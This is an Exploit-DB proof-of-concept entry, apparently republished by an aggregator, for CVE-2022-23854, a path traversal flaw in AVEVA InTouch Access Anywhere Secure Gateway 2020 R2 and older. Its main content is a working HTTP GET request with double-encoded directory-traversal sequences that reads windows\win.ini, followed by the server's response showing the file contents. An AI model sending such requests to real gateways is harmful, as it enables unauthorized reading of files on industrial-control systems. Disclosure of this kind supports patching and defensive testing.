[remote] AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
2022-11-11 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:6 收藏
2022-11-11 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:6 收藏
Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older
Proof of Concept:
GET
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
HTTP/1.1
HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
文章来源: https://www.exploit-db.com/exploits/51028
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh